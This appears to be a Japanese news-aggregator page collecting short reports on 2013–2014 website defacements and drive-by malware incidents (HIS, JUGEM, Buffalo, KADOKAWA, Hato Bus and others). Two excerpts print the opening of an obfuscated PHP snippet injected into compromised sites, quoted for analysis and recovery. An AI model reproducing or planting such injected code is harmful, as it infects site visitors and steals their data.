エイチ・アイ・エス(HIS)とリクルートマーケティングパートナーズは2014年5月30日、HISのWebサーバーにアクセスすると「ウイルスに感染する恐れがある」とウイルス対策ソフトが警告を表示した原因を明らかにした。原因は、HISのWebページを表示する際に呼び出していた、外部委託先のサーバーにあったコンテンツが第三者に改ざんされ、アクセスしたユーザーが改ざんされたコンテンツによってウイルスに感染させられる恐れがあったからだった。リクルートマーケティングパートナーズは、HISの外部委託先である。 ウイルス対策ソフトの警告は、5月24日から26日の間に表示された。HISは、26日午後6時に外部配信サーバーでの処理に問題があると判断し、Webページ上から外部配信サーバーにアクセスするための記述を削除していた。 両社は、5月24日から26日の間にHISのWebサーバーにアクセスしたユーザーには、
大手旅行会社の「H.I.S.」と、人気のブログサービス、「JUGEM」のホームページが、何者かによって、閲覧しただけでウイルスに感染するよう仕組まれていたことが分かりました。 一部のウイルスには、ネットバンキングの口座情報を送信する機能もあったということで、それぞれの会社が注意を呼びかけています。 ウイルス感染のおそれがあったのは、大手旅行会社「H.I.S.」と、人気のブログサービス「JUGEM」のトップページと、そこからリンクされたページの一部です。 それぞれ、「H.I.S.」は今月24日未明から26日の午後6時ごろまで、JUGEMは今月24日未明から28日の正午ごろまで、何者かによって、ページを閲覧した人がウイルスに感染するよう仕組まれていたということです。このウイルスには、パソコンに導入している「Flash Player」という画像表示ソフトが最新のものでないと感染するようになってい
バッファローが自社ドライバダウンロードサイトが不正アクセスを受け、ドライバではなくマルウェアを配布していたことを発表しました。配布されていたマルウェアはJUGEMやHISで話題となっているInfostealer.Bankeiya.Bに関連するようです。 関連記事 JUGEMで起きた改ざん等についてはこちらにまとめています。 JUGEMブログの改ざんについてまとめてみた オンラインゲームサイトが不正アクセスを受け、更新ファイルがマルウェアにすり替えられていた件をまとめてみた。 CDNetworksで発生したコンテンツ改ざんと一連のマルウェア感染インシデントを改めてまとめてみた ここではバッファローへの不正アクセスとその他情報について調べたことをまとめます。 バッファローより詳細が公開されました。 バッファローより感染するマルウェアの情報や経緯等が公開されました。 <ご参考:これまでの経緯>
この度は弊社ダウンロードサーバーの休止で多大なご迷惑をお掛けしました事、深くお詫び申し上げます。 調査の結果、弊社委託のダウンロードサーバー内の一部のファイルが不正に改ざんされていた事が判明しました。 改ざんされたファイルをダウンロードし実行されたお客様のパソコンはウィルスに感染している可能性がございます。 早急にウィルスパターンファイルを最新にしていただきウィルスチェックをお願いいたします。 本件に関するお問い合わせは下記、専用窓口へお願いいたします。
いつもJUGEMをご利用いただきまして、ありがとうございます。 ただいま、JUGEMのポータルTOP及びブログページにアクセスされると、 ウィルス対策ソフトが作動するとのお問い合わせをいただいております。 この件について、ただいま各種ページについて調査・対応を行っております。 恐れ入りますが、完了までしばらくお待ち頂きますようお願いいたします。 進捗状況につきましては、随時当お知らせブログにてご報告いたします。 どうぞよろしくお願いいたします。 --- ■ 20:18 追記 タイトル及び本文に表現が異なる箇所があったため 修正させていただきました。 ウィルスソフト → ウィルス対策ソフト この度は、表題の件に関しまして、ご不安とご心配をおかけいたしており、 誠に申し訳ございません。 現時点で判明している状況をご報告申し上げます。 <ウィルス対策ソフトが作動した経緯について> JUGEM公式
セガは2014年5月12日、同社Webサイトの一部が不正アクセスを受けたとして、サイトの閲覧を停止した(関連記事:セガのWebサイトに不正アクセス、Webページ改ざんや情報流出は確認されず)。 セガは5月16日に、閉鎖したサイトの一部を再開した。現在、復旧作業を順次、進めている。
出版大手のKADOKAWAのサーバーが不正アクセスを受けた問題において、同社サーバーを経由して大手銀行を装うフィッシングメールが送られていることが判明した(関連記事:「KADOKAWA」のサーバーに再び不正アクセス、フィッシングの踏み台に)。 フィッシングメールに記載されているリンクを開くと、大手銀行を装う偽サイトに誘導される。偽サイトでは、ログインパスワードや暗証番号といった個人情報の入力を要求。入力すると、それらの情報は全て攻撃者に盗まれる。 KADOKAWAが同社サーバー経由でフィッシングメールが送信されていることに気付いたのは、2014年3月19日の16時ごろ。「利用者からの問い合わせで判明した」(同社広報)という。同日の16時半過ぎにはサーバーのメンテナンスという理由で、公式サイトを一旦閉鎖した。 その後、個人情報の流出やウイルス(マルウエア)感染を広げる恐れについて調査。そのよ
はとバスは2月25日、同社のWebサイト「はとバスホームページ」の一部が第三者による不正アクセスで改ざんされ、閲覧者がウイルスに感染した恐れがあると発表した。同サイトは一時的に閉鎖している。 改ざんされていた可能性がある期間は、2月18日午後9時48分~24日午前10時50分。閲覧すると不正なプログラムが実行され、ウイルスに感染する恐れがあったという。期間中のアクセス数は約7万5000、閲覧者数は約6万8000人だったという。 ウイルスの挙動などは「調査中」。期間中にサイトを閲覧したユーザーに対しては、ウイルスチェックを行うよう呼びかけている。 関連記事 KADOKAWAの公式サイトが改ざん 閲覧者がマルウェア感染の恐れ KADOKAWAのサイトが不正アクセスで改ざん。オンラインバンキングなどの情報を盗み出すトロイの木馬が仕込まれており、閲覧者が感染した恐れがある。 関連リンク はとバス
画面●はとバスが公開している告知ページ。このページ以外は全て閉鎖している(2014年2月26日21時現在) 観光バスなどを運行している はとバスは2014年2月26日、同社のWebページが改ざんされたことを明らかにした(画面)。改ざんされたWebページにアクセスしたパソコンは、ウイルスに感染している恐れがある。 同社によれば、改ざんが確認されたのはパソコン向けのWebページ。モバイル向けのWebページや、外国語のWebページについては、改ざんは確認されていないものの、パソコン向けWebページと同様に、告知ページ以外は全て閉鎖されている(2014年2月26日21時現在)。 同社のWebサイトが第三者によって不正アクセスされ、Webページが改ざん。Webページにアクセスすると、ウイルスに感染するような仕掛けが施されたもようだ。改ざんされたWebページが公開されていたのは、2014年2月18日2
角川書店などを運営する大手出版社「KADOKAWA」のホームページが、今月上旬、何者かによって改ざんされていたことが分かりました。 閲覧した人のパソコンは、ネットバンキングのパスワードを盗み取るウイルスに感染したおそれがあります。 改ざんされたのは、出版物の案内などを行う「KADOKAWA」のサイトのトップページです。 会社側の説明によりますと、このページは、今月7日午前1時前、何者かによって改ざんされ、ページを閲覧した人のパソコンが、ネットバンキングのIDやパスワードなどを盗み取るウイルスに感染するよう、仕組まれていたということです。 このページは、会社側が対策を済ませた8日午後1時すぎまで1日半にわたって外部に公開され、その間に、およそ1万回のアクセスがあったということです。 ウイルスには、閲覧した人のソフトが最新のものでないと、感染するようになっていたということですが、KADOKAW
IEのゼロデイ攻撃で最初のトリガーとなった「Web改ざん」。改ざんされた後の対応次第では、被害をさらに広げてしまう結果になりかねません。今回は、筆者が見かけた「いまいちイケてない」インシデント対応を紹介します。 連載目次 エポックメーキングな出来事だったIEのゼロデイ攻撃 皆さんこんにちは、川口です。気が付けば半年もこのコラムからご無沙汰しておりました。あちこちで「最近は書かないんですか?」と聞かれてしまい、期待していただいている方には申し訳ない気分でいっぱいです。言い訳をすると、仕事も少し変わり、Hardening One Remixをやり、セキュリティキャンプをやり、出張三昧が続き……と目まぐるしい生活を送っていました。 そんなこんなの生活を送っているうちに、Internet Explorer(IE)に存在したゼロデイ脆弱性を狙った事件が発生していました。私がセキュリティを意識するよう
「4月ころから相次いでいるWeb改ざんは、2009年に猛威をふるった『Gumblar』と同種の攻撃と見られる」。トレンドマイクロでWebセキュリティやマルウエア解析の情報発信を担当する岡本勝之コアテク・スレットマーケティング課担当課長代理は2013年7月1日、本誌の取材に対して最近のWeb改ざんに関する見解を示した。 GumblarはWeb管理者のFTPアカウントを盗み出し、それを使ってコンテンツを改ざんして不正なスクリプトや不正なリンクを追加する攻撃だった。改ざんされたWebサイトを閲覧すると、不正なWebサイトに誘導されてマルウエアに感染する(関連特集:実践、Gumblar対策)。最近のWeb改ざんについて岡本氏は「FTPアカウントを乗っ取る、Webサイト上の多くのページを改ざんして不正スクリプトを埋め込む、スクリプトが難読化されている、といった特徴がGumblarとほぼ同じ」と指摘す
5月末から、国内組織のWebサーバが改ざんされ、アクセスしたユーザーを不正なサイトに誘導してマルウェアをダウンロードさせた可能性がある事件が連続して発生している。 5月末から、国内組織のWebサーバが改ざんされ、アクセスしたユーザーを不正なサイトに誘導してマルウェアをダウンロードさせた可能性がある事件が連続して発生している。 科学技術振興機構(JST)は6月3日、同機構の研究開発戦略センターのWebサイトが改ざんされていたことを明らかにした。改ざんされていた期間は5月25日から6月3日まで。この期間に「デイリーウォッチャー」など研究開発戦略センターのサイトにアクセスした場合、閲覧者はウイルスや不正プログラムに感染した恐れがある。JSTによると、今のところ被害の申し出はないというが、念のため、ウイルス駆除ソフトを最新の状態にし、感染確認・駆除を行うよう呼び掛けている。 これに先立つ5月30日
環境省が運営する二酸化炭素の削減に関するホームページが、外部から改ざんされていたことが分かりました。 このホームページにアクセスすると個人のデータが盗まれる可能性もあり、環境省はホームページを閉鎖し、詳しい原因を調べています。 改ざんが見つかったのは、環境省が運営する「CO2みえ~るツール」というホームページで、家庭の光熱費や使用家電の種類を入力すると、二酸化炭素の排出量が計算できるものです。 環境省によりますと15日、ホームページなどの監視を行っているNGOから指摘を受け、調べたところ、ホームページを管理するサーバー上のプログラムが改ざんされていたということです。 これまでの調査でホームページは今月3日に外部から侵入されていた形跡があり、このページにアクセスすると悪質なウイルスに感染する別のページに誘導され、パソコン内の個人のデータなどが盗まれる可能性があったということです。 このページ
印刷 関連トピックス参議院選挙Youtubeグーグル 自民党の西田昌司参院議員(京都選挙区)が動画投稿サイト「You Tube」(ユーチューブ)に設けている個人サイトに、何者かが不正に、外国人女性が登場するポルノ広告を掲載していたことが分かった。掲載に必要なグーグルのIDとパスワードを盗まれたとみられる。西田氏の事務所は2月1日、威力業務妨害容疑で警視庁に被害届を出す予定。 事務所によると、西田氏のサイトに30日未明、ロシア語で「ポルノ動画無料」などと記された動画が勝手に掲載された。サイトを閉鎖して、復旧作業を進めている。 サイトは2009年12月に開設され、西田氏の政策や政治活動を紹介している。
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL
MicrosoftのYouTube公式チャンネルがハッキングされたようだ。犯人はMicrosoftの動画をすべて削除した。 同チャンネルの背景画像は、「Predator Cinema」というタイトルを含んだものに変更され、コメント欄には「悪いことは何もしていない。2006年に開設した自分のアカウントにサインインしただけだ」というメッセージが投稿されている。 同チャンネルにアーカイブされている動画は削除され、代わりに「We are sponsoring!」や「Make us a background to get a Subbox!!!」というタイトルの付いた短いクリップが掲載されている。 Microsoft関係者は、「YouTubeにおけるMicrosoftチャネルの制御を取り戻しており、本来あったコンテンツすべてを復旧させるべく作業中である」と米CNETに述べた。「将来に向けた予防措置が
ギリシャのソニー・ミュージックエンタテインメントのウェブサイト「SonyMusic.gr」がSQLインジェクションによる攻撃を受け、8300人以上のユーザーの氏名、ユーザー名、電子メールアドレスがPastebin.comに掲載されたという。The Hacker Newsが米国時間22日に伝えた。この記事には、「hacked by b4d_vipera」(b4d_viperaによりハック)と書かれたスクリーンショットが掲載されている。リンクされたPastebinのページは、23日午前の時点で空になっている。 セキュリティ企業SophosのChester Wisniewski氏は、自身のNaked Securityブログの記事で、Pastebinのデータはパスワードや電話番号なども含んでいると主張されているが、それらは欠けているか偽造であり、掲載されたデータは不完全なもののようだと述べている。
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
